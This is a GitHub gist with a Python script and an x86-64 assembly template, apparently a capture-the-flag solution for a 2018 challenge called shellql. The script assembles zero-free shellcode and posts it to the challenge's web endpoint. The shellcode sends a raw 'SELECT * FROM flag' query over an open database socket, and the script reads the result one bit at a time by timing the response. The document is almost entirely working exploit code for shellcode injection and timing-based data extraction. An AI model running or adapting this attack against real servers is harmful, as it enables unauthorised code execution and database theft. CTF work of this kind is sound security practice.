Skip to content

Instantly share code, notes, and snippets.

@ymgve

ymgve/shellql.py

Created May 14, 2018 01:06
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save ymgve/b9c9fdb2d6b254487451dd08d237879e to your computer and use it in GitHub Desktop.
Save ymgve/b9c9fdb2d6b254487451dd08d237879e to your computer and use it in GitHub Desktop.
Download ZIP
Raw
shellql.py
import requests, time, os
ss = "X"
for index in xrange(len(ss), 200):
s = ""
for i in xrange(8):
data = open("template.asm", "rb").read()
data = data.replace("{bitmask}", str(1 << i))
data = data.replace("{index}", str(index))
open("test.asm", "wb").write(data)
os.system("d:\\temp\\nasm-2.11.08\\nasm.exe test.asm")
#os.system("d:\\temp\\nasm-2.11.08\\ndisasm.exe -b 64 test")
shell = open("test", "rb").read()
if "\x00" in shell:
print "ZERO IN SHELL"
exit()
data = {"shell": shell}
start = time.time()
res = requests.post("http://b9d6d408.quals2018.oooverflow.io/cgi-bin/index.php", data=data)
spent = time.time() - start
if spent > 3:
s += "1"
else:
s += "0"
print s
ss += chr(int(s[::-1], 2))
print repr(ss)
Raw
template.asm
bits 64
jmp tramp1
tramp2:
jmp tramp3
tramp1:
call tramp2
tramp3:
pop rsi
mov rax, rsi
mov al, data
mov rsi, rax
push rsi
foo2:
xor rax, rax
mov byte [rsi+1], al
mov byte [rsi+2], al
mov byte [rsi+3], al
xor rax, rax
mov al, 4
mov rdi, rax
xor rax, rax
mov al, dataend-data
mov rdx, rax
xor rax, rax
mov al, 1
syscall
xor rdx, rdx
mov dl, 0x80
shl rdx, 1
pop rax
mov al, 1
dec rax
add rax, rdx
push rax
mov rsi, rax
xor rax, rax
mov al, 4
mov rdi, rax
xor rax, rax
mov al, 0xff
mov rdx, rax
xor rax, rax
syscall
pop rsi
mov rax, rsi
mov al, {index}
mov rsi, rax
mov al, byte [rsi]
and al, {bitmask}
jnz foo
retn
foo:
jmp foo
;mov rbp, 0
data:
db 19,1,1,1, 3, "SELECT * FROM flag "
dataend:
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment